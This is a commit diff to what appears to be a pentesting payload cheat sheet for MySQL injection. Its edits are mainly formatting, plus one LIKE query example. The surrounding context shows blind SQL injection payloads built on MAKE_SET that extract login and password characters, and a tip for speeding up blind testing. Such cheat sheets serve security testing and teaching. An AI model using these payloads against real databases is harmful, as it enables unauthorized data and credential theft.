PHP Deserialization + API keys table typo

2025-12-30 14:40:28 -08:00 · 2024-02-18 15:29:21 +01:00
parent 97cfeee270
commit dd2b68b70e
3 changed files with 46 additions and 22 deletions
--- a/Injection/MySQL
+++ b/Injection/MySQL
@@ -339,6 +339,7 @@ Response:
 HTTP/1.1 200 OK
 ```

+
 ### MYSQL Blind with MAKE_SET

 ```sql
@@ -348,14 +349,17 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
 AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```

+
 ### MYSQL Blind with LIKE

 ['_'](https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php) acts like the regex character '.', use it to speed up your blind testing

 ```sql
 SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
+SELECT * FROM products WHERE product_name LIKE '%user_input%'
 ```

+
 ## MYSQL Time Based

 The following SQL codes will delay the output from MySQL.